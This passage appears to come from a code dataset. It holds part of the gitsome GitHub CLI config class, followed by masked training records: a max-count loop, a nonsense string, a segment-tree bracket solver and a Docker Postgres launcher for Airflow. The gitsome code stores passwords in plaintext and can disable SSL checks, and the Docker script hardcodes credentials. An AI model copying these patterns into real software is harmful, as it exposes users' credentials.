CONFIG_CLR_VIEW_INDEX = 'clr_view_index'\n CONFIG_SECTION = 'github'\n CONFIG_USER_LOGIN = 'user_login'\n CONFIG_USER_PASS = 'user_pass'\n CONFIG_USER_TOKEN = 'user_token'\n CONFIG_USER_FEED = 'user_feed'\n CONFIG_ENTERPRISE_URL = 'enterprise_url'\n CONFIG_VERIFY_SSL = 'verify_ssl'\n CONFIG_URL = '.gitsomeconfigurl'\n CONFIG_URL_SECTION = 'url'\n CONFIG_URL_LIST = 'url_list'\n CONFIG_AVATAR = '.gitsomeconfigavatar.png'\n\n def __init__(self):\n self.api = None\n self.user_login = None\n self.user_pass = None\n self.user_token = None\n self.user_feed = None\n self.enterprise_url = None\n self.verify_ssl = True\n self.urls = []\n self._init_colors()\n self.load_configs([\n self.load_config_colors,\n ])\n self.login = login\n self.authorize = authorize\n self.getpass = getpass\n\n def _init_colors(self):\n \"\"\"Initialize colors to their defaults.\"\"\"\n self.clr_primary = None\n self.clr_secondary = 'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'\n\n def authenticate_cached_credentials(self, config, parser,\n enterprise_auth=enterprise_login):\n \"\"\"Authenticate with the user's credentials in ~/.gitsomeconfig.\n\n :type config: str\n :param config: The config path.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser.\n \"\"\"\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.user_login = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_USER_LOGIN)\n self.user_pass = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_USER_PASS)\n self.user_token = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_USER_TOKEN)\n self.enterprise_url = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_ENTERPRISE_URL)\n self.verify_ssl = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_VERIFY_SSL,\n boolean_config=True)\n self.user_feed = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_USER_FEED)\n if not self.verify_ssl:\n # The user has chosen not to verify SSL certs.\n # Disable warnings related to this option.\n requests.packages.urllib3.disable_warnings(\n InsecureRequestWarning)\n login_kwargs = {\n 'username': self.user_login,\n 'two_factor_callback': self.request_two_factor_code,\n }\n if self.enterprise_url is not None:\n self.login = enterprise_auth\n login_kwargs.update({\n 'url': self.enterprise_url,\n 'verify': self.verify_ssl,\n })\n if self.user_token is not None:\n login_kwargs.update({'token': self.user_token})\n elif self.user_pass is not None:\n login_kwargs.update({'password': self.user_pass})\n else:\n self.print_auth_error()\n return\n else:\n login_kwargs.update({'token': self.user_token})\n self.api = self.login(**login_kwargs)\n\n def authenticate(self, enterprise=False,\n enterprise_auth=enterprise_login, overwrite=False):\n \"\"\"Log into GitHub.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type enterprise: bool\n :param enterprise: Determines whether to configure GitHub Enterprise.\n Default: False.\n\n :type overwrite: bool\n :param overwrite: indicates whether we cant to overwrite the current\n set of credentials. Default: False.\n \"\"\"\n if self.api is not None and not overwrite:\n return\n # Get the full path to the configuration file.\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n # Check to make sure the file exists and we are allowed to read it.\n # Skip if we want to overwrite the auth settings.\n if os.path.isfile(config) and os.access(config, os.R_OK | os.W_OK) and \\\n not overwrite:\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.authenticate_cached_credentials(config, parser)\n else:\n # The file didn't exist or we don't have the correct permissions.\n login_kwargs = {\n 'two_factor_callback': self.request_two_factor_code,\n }\n if enterprise:\n self.login = enterprise_auth\n while not self.enterprise_url:\n self.enterprise_url = input('Enterprise URL: ')\n if click.confirm('Do you want to verify SSL certs?',\n default=True):\n self.verify_ssl = True\n else:\n self.verify_ssl = False\n login_kwargs.update({\n 'url': self.enterprise_url,\n 'verify': self.verify_ssl,\n })\n while not self.user_login:\n self.user_login = input('User Login: ')\n login_kwargs.update({'username': self.user_login})\n if click.confirm(('Do you want to log in with a password [Y] or '\n 'a personal access token [n]?'),\n default=True):\n user_pass = None\n while not user_pass:\n user_pass = self.getpass('Password: ')\n login_kwargs.update({'password': user_pass})\n try:\n if not enterprise:\n # Trade the user password for a personal access token.\n # This does not seem to be available for Enterprise.\n auth = self.authorize(\n self.user_login,\n user_pass,\n scopes=['user', 'repo'],\n note='gitsome',\n note_url='https://github.com/donnemartin/gitsome',\n two_factor_callback=self.request_two_factor_code\n )\n self.user_token = auth.token\n else:\n self.user_pass = user_pass\n except (UnprocessableEntity, AuthenticationFailed):\n click.secho('Error creating token.',\n fg=self.clr_error)\n click.secho(('Visit the following page and verify you do '\n 'not have an existing token named \"gitsome\":\\n'\n ' https://github.com/settings/tokens\\n'\n 'If a token already exists, update your '\n '~/.gitsomeconfig file with your token:\\n'\n ' user_token = TOKEN\\n'\n 'You can also generate a new token.'),\n fg=self.clr_message)\n self.print_auth_error()\n return\n else:\n # The user has chosen to authenticate with a token.\n while not self.user_token:\n self.user_token = input('Token: ')\n login_kwargs.update({'token': self.user_token})\n self.api = self.login(**login_kwargs)\n if self.user_feed:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_FEED,\n self.user_feed)\n\n def check_auth(self):\n \"\"\"Check if the current authorization is valid.\n\n This method uses the ratelimit_remaining api to check whether\n the currently authenticated user's credentials are valid without\n deducting from the rate limit. The ratelimit_remaining api does not\n seem to be available for GitHub Enterprise.\n\n github3.py's method check_authorization seems to only work given\n an authorization created by a registered application.\n\n TODO: Determine a better way to check the authorization for\n GitHub Enterprise.\n\n :type enterprise: bool\n :param enterprise: Determines whether we are authenticating with\n GitHub Enterprise.\n \"\"\"\n if self.enterprise_url is not None:\n return True\n try:\n if self.api is not None:\n # Throws AuthenticationFailed if invalid credentials but\n # does not deduct from the rate limit.\n self.api.ratelimit_remaining\n return True\n else:\n self.print_auth_error()\n except AuthenticationFailed:\n self.print_auth_error()\n return False\n\n def get_github_config_path(self, config_file_name):\n \"\"\"Attempt to find the github config file.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type config_file_name: str\n :param config_file_name: The config file name.\n\n :rtype: str\n :return: The github config file path.\n \"\"\"\n home = os.path.abspath(os.environ.get('HOME', ''))\n config_file_path = os.path.join(home, config_file_name)\n return config_file_path\n\n def load_config(self, parser, cfg_label, default=None,\n color_config=False, boolean_config=False):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n\n :type cfg_label: str\n :param cfg_label: The config label to load.\n\n :type default: str\n :param default: The default color if no color config exists.\n Default: None.\n\n :type color_config: bool\n :param color_config: Determines whether this is a color config.\n Default: False.\n\n :type boolean_config: bool\n :param boolean_config: Determines whether to load a boolean config.\n Default: False.\n \"\"\"\n try:\n if boolean_config:\n cfg = parser.getboolean(self.CONFIG_SECTION, cfg_label)\n else:\n cfg = parser.get(self.CONFIG_SECTION, cfg_label)\n if color_config:\n if cfg == 'none':\n cfg = None\n # Check if the user input a valid color.\n # If invalid, this will throw a TypeError\n click.style('', fg=cfg)\n except (TypeError, configparser.NoOptionError):\n return default\n return cfg\n\n def load_configs(self, config_funcs):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type foo: list\n :param foo: The config methods to run.\n \"\"\"\n config_file_path = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n try:\n with open(config_file_path) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n for config_func in config_funcs:\n config_func(parser)\n except IOError:\n # There might not be a cache yet, just silently return.\n return None\n\n def load_config_colors(self, parser):\n \"\"\"Load the color config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.load_colors(parser)\n\n def load_colors(self, parser):\n \"\"\"Load all colors from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.clr_primary = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_PRIMARY,\n default=self.clr_primary,\n color_config=True)\n self.clr_secondary = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_SECONDARY,\n default=self.clr_secondary,\n color_config=True)\n self.clr_tertiary = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TERTIARY,\n default=self.clr_tertiary,\n color_config=True)\n self.clr_quaternary = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_QUATERNARY,\n default=self.clr_quaternary,\n color_config=True)\n self.clr_bold = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_BOLD,\n default=self.clr_bold,\n color_config=True)\n self.clr_code = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_CODE,\n default=self.clr_code,\n color_config=True)\n self.clr_code = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_ERROR,\n default=self.clr_code,\n color_config=True)\n self.clr_header = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_HEADER,\n default=self.clr_header,\n color_config=True)\n self.clr_link = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_LINK,\n default=self.clr_link,\n color_config=True)\n self.clr_list = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_LIST,\n default=self.clr_list,\n color_config=True)\n self.clr_message = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_MESSAGE,\n default=self.clr_message,\n color_config=True)\n self.clr_num_comments = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_NUM_COMMENTS,\n default=self.clr_num_comments,\n color_config=True)\n self.clr_num_points = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_NUM_POINTS,\n default=self.clr_num_points,\n color_config=True)\n self.clr_tag = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TAG,\n default=self.clr_tag,\n color_config=True)\n self.clr_time = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TIME,\n default=self.clr_time,\n color_config=True)\n self.clr_title = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TITLE,\n default=self.clr_title,\n color_config=True)\n self.clr_tooltip = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TOOLTIP,\n default=self.clr_tooltip,\n color_config=True)\n self.clr_user = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_USER,\n default=self.clr_user,\n color_config=True)\n self.clr_view_link = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_VIEW_LINK,\n default=self.clr_view_link,\n color_config=True)\n self.clr_view_index = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_VIEW_INDEX,\n default=self.clr_view_index,\n color_config=True)\n\n def load_urls(self, view_in_browser):\n \"\"\"Load the current set of urls from ~/.gitsomeconfigurl.\n\n :type view_in_browser: bool\n :param view_in_browser: Determines whether to view the urls in a\n browser.\n\n :rtype: list\n :return: Collection of urls.\n \"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n urls = parser.get(self.CONFIG_URL_SECTION,\n self.CONFIG_URL_LIST)\n urls = urls.strip()\n excludes = ['[', ']', \"'\"]\n for exclude in excludes:\n urls = urls.replace(exclude, '')\n if not view_in_browser:\n urls = urls.replace('https://github.com/', '')\n return urls.split(', ')\n\n def print_auth_error(self):\n \"\"\"Print a message the authorization has failed.\"\"\"\n click.secho('Authentication error.', fg=self.clr_error)\n click.secho(('Update your credentials in ~/.gitsomeconfig '\n 'or run:\\n gh configure'),\n fg=self.clr_message)\n\n def prompt_news_feed(self):\n \"\"\"Prompt the user to enter a news feed url.\"\"\"\n if click.confirm(('No feed url detected.\\n Calling gh events without '\n \"an argument\\n displays the logged in user's \"\n 'news feed.\\nDo you want gitsome to track your '\n 'news feed?'),\n default=True):\n click.secho(('Visit the following url while logged into GitHub:\\n'\n ' https://github.com\\n'\n 'Enter the url found under \"Subscribe to your '\n 'news feed\".'),\n fg=self.clr_message)\n self.user_feed = ''\n while not self.user_feed:\n self.user_feed = input('URL: ')\n\n def request_two_factor_code(self):\n \"\"\"Request two factor authentication code.\n\n Callback if two factor authentication is requested.\n\n :rtype: str\n :return: The user input two factor authentication code.\n \"\"\"\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code\n\n def save_config(self):\n \"\"\"Saves the config to ~/.gitsomeconfig.\"\"\"\n if self.check_auth():\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n parser.add_section(self.CONFIG_SECTION)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_LOGIN,\n self.user_login)\n if self.user_token is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_TOKEN,\n self.user_token)\n if self.user_feed is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_FEED,\n self.user_feed)\n if self.enterprise_url is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_ENTERPRISE_URL,\n self.enterprise_url)\n if self.user_pass is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_PASS,\n self.user_pass)\n else:\n parser.remove_option(self.CONFIG_SECTION,\n self.CONFIG_USER_PASS)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_VERIFY_SSL,\n self.verify_ssl)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_PRIMARY,\n self.clr_primary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_SECONDARY,\n self.clr_secondary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TERTIARY,\n self.clr_tertiary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_QUATERNARY,\n self.clr_quaternary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_BOLD,\n self.clr_bold)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_CODE,\n self.clr_code)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_ERROR,\n self.clr_error)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_HEADER,\n self.clr_header)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_LINK,\n self.clr_link)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_LIST,\n self.clr_list)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_MESSAGE,\n self.clr_message)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_NUM_COMMENTS,\n self.clr_num_comments)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_NUM_POINTS,\n self.clr_num_points)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TAG,\n self.clr_tag)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TIME,\n self.clr_time)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TITLE,\n self.clr_title)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TOOLTIP,\n self.clr_tooltip)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_USER,\n self.clr_user)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_VIEW_LINK,\n self.clr_view_link)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_VIEW_INDEX,\n self.clr_view_index)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def save_urls(self):\n \"\"\"Save the current set of urls to ~/.gitsomeconfigurl.\"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n try:\n parser.add_section(self.CONFIG_URL_SECTION)\n except configparser.DuplicateSectionError:\n pass\n parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def show_bash_completions_info(self):\n \"\"\"Show info on how to enable bash completions\"\"\"\n click.secho(('By default, gitsome looks at the following locations '\n 'to enable bash completions:\\n'\n ' https://github.com/donnemartin/gitsome/blob/master/xonsh/environ.py#L123-L130\\n' # NOQA\n 'If bash completions are not working for you, check out '\n 'the following link:\\n'\n ' https://github.com/donnemartin/gitsome#enabling-bash-completions'), # NOQA\n fg=self.clr_message)\n", "step-ids": [ 13, 15, 16, 18, 22 ] }
[ 13, 15, 16, 18, 22 ]
count = 0 maximum = -1 m = -1 while m != 0: m = int(input()) if m > maximum: maximum = m count = 1 elif m == maximum: count += 1 print(count)
normal
{ "blob_id": "0e1ea8c7fba90c1b5d18eaa399b91f237d4defee", "index": 2568, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile m != 0:\n m = int(input())\n if m > maximum:\n maximum = m\n count = 1\n elif m == maximum:\n count += 1\nprint(count)\n", "step-3": "count = 0\nmaximum = -1\nm = -1\nwhile m != 0:\n m = int(input())\n if m > maximum:\n maximum = m\n count = 1\n elif m == maximum:\n count += 1\nprint(count)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
5 1 6 1x 1112#Desember@@@@@
normal
{ "blob_id": "b324c520400f04719b17121b0b4c2d23915e8841", "index": 2666, "step-1": "5 1\r\n6 1x\r\n1112#Desember@@@@@", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from math import ceil, log2, sqrt def constructST(s, start, end, st, i): if start == end: st[i] = 0 openst[i] = 1 if s[start] == '(' else 0 closedst[i] = 1 if s[start] == ')' else 0 return st[i], openst[i], closedst[i] else: mid = (start+end)//2 st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2*i+1) a, b, c = constructST(s, mid+1, end, st, 2*i+2) tmp = min(openst[2*i+1], closedst[2*i+2]) st[i] += tmp + a openst[i] += b-tmp closedst[i] += c -tmp return st[i], openst[i], closedst[i] def query(s, start, end, l, r, st, i): if l > end or r < start: return 0, 0, 0 elif start >= l and end <= r: return st[i], openst[i], closedst[i] else: mid = (start + end)//2 a, b, c = query(s, start, mid, l, r, st, 2*i+1) d, e, f = query(s, mid+1, end, l, r, st, 2*i+2) tmp = min(b, f) T = a+d +tmp O = b+e - tmp C = c+f - tmp return T, O, C s = input() n = len(s) x = int(ceil(log2(n))) max_size = 2*pow(2, x) -1 st = [0 for i in range(0, max_size)] openst = [0 for i in range(0, max_size)] closedst = [0 for i in range(0, max_size)] constructST(s, 0, n-1, st, 0) # print(st) # print(openst) # print(closedst) for _ in range(int(input())): l, r = map(int, input().split()) print(2*query(s, 0, n-1, l-1, r-1, st, 0)[0])
normal
{ "blob_id": "ccc74f58eff3bb00f0be8c2c963de4208b7f0933", "index": 9125, "step-1": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n", "step-3": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n", "step-4": "from math import ceil, log2, sqrt\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n", "step-5": "from math import ceil, log2, sqrt\r\n\r\ndef constructST(s, start, end, st, i):\r\n\tif start == end:\r\n\t\tst[i] = 0\r\n\t\topenst[i] = 1 if s[start] == '(' else 0\r\n\t\tclosedst[i] = 1 if s[start] == ')' else 0\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\n\telse:\r\n\t\tmid = (start+end)//2\r\n\t\tst[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2*i+1) \r\n\t\ta, b, c = constructST(s, mid+1, end, st, 2*i+2)\r\n\t\ttmp = min(openst[2*i+1], closedst[2*i+2])\r\n\t\tst[i] += tmp + a\r\n\t\topenst[i] += b-tmp\r\n\t\tclosedst[i] += c -tmp\r\n\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\ndef query(s, start, end, l, r, st, i):\r\n\tif l > end or r < start:\r\n\t\treturn 0, 0, 0\r\n\telif start >= l and end <= r:\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\telse:\r\n\t\tmid = (start + end)//2\r\n\t\ta, b, c = query(s, start, mid, l, r, st, 2*i+1) \r\n\t\td, e, f = query(s, mid+1, end, l, r, st, 2*i+2)\r\n\t\ttmp = min(b, f)\r\n\t\tT = a+d +tmp\r\n\t\tO = b+e - tmp\r\n\t\tC = c+f - tmp\r\n\treturn T, O, C\r\n\r\n\r\n\r\ns = input()\r\nn = len(s)\r\nx = int(ceil(log2(n)))\r\nmax_size = 2*pow(2, x) -1\t\r\n\r\nst = [0 for i in range(0, max_size)]\r\nopenst = [0 for i in range(0, max_size)]\r\nclosedst = [0 for i in range(0, max_size)]\r\n\r\nconstructST(s, 0, n-1, st, 0)\r\n# print(st)\r\n# print(openst)\r\n# print(closedst)\r\nfor _ in range(int(input())):\r\n\tl, r = map(int, input().split())\r\n\tprint(2*query(s, 0, n-1, l-1, r-1, st, 0)[0])\r\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import docker import logging import sys if __name__ == '__main__': # setting up logger logging.basicConfig(stream=sys.stdout, format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s', level=logging.DEBUG) # get the docker client client = docker.from_env() # list out docker volumes logging.info(str([x.name for x in client.volumes.list()])) # Check if airflow backend volume is created or not # if the volume is not created then create it if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]: client.volumes.create('airflow_pg_data') # kill container if it is already running logging.info(str([x.name for x in client.containers.list()])) if 'airflow_pg' not in [x.name for x in client.containers.list()]: # launch postgres backend pg = client.containers.run(image='postgres', name='airflow_pg', auto_remove=True, detach=True, environment={ 'POSTGRES_PASSWORD': 'airflow', 'POSTGRES_USER': 'airflow', 'PGDATA': '/airflow/data' }, volumes={'airflow_pg_data': {'bind': '/airflow/data', 'mode': 'rw'}}, ports={'5432/tcp': 5432} )
normal
{ "blob_id": "a5c9ff1fe250310216e2eaa7a6ff5cc76fc10f94", "index": 4324, "step-1": "<mask token>\n", "step-2": "<mask token>\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, format=\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n level=logging.DEBUG)\n client = docker.from_env()\n logging.info(str([x.name for x in client.volumes.list()]))\n if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:\n client.volumes.create('airflow_pg_data')\n logging.info(str([x.name for x in client.containers.list()]))\n if 'airflow_pg' not in [x.name for x in client.containers.list()]:\n pg = client.containers.run(image='postgres', name='airflow_pg',\n auto_remove=True, detach=True, environment={'POSTGRES_PASSWORD':\n 'airflow', 'POSTGRES_USER': 'airflow', 'PGDATA':\n '/airflow/data'}, volumes={'airflow_pg_data': {'bind':\n '/airflow/data', 'mode': 'rw'}}, ports={'5432/tcp': 5432})\n", "step-3": "import docker\nimport logging\nimport sys\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, format=\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n level=logging.DEBUG)\n client = docker.from_env()\n logging.info(str([x.name for x in client.volumes.list()]))\n if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:\n client.volumes.create('airflow_pg_data')\n logging.info(str([x.name for x in client.containers.list()]))\n if 'airflow_pg' not in [x.name for x in client.containers.list()]:\n pg = client.containers.run(image='postgres', name='airflow_pg',\n auto_remove=True, detach=True, environment={'POSTGRES_PASSWORD':\n 'airflow', 'POSTGRES_USER': 'airflow', 'PGDATA':\n '/airflow/data'}, volumes={'airflow_pg_data': {'bind':\n '/airflow/data', 'mode': 'rw'}}, ports={'5432/tcp': 5432})\n", "step-4": "import docker\nimport logging\nimport sys\n\nif __name__ == '__main__':\n\n # setting up logger\n logging.basicConfig(stream=sys.stdout,\n format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n level=logging.DEBUG)\n\n # get the docker client\n client = docker.from_env()\n\n # list out docker volumes\n logging.info(str([x.name for x in client.volumes.list()]))\n\n # Check if airflow backend volume is created or not\n # if the volume is not created then create it\n if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:\n client.volumes.create('airflow_pg_data')\n\n # kill 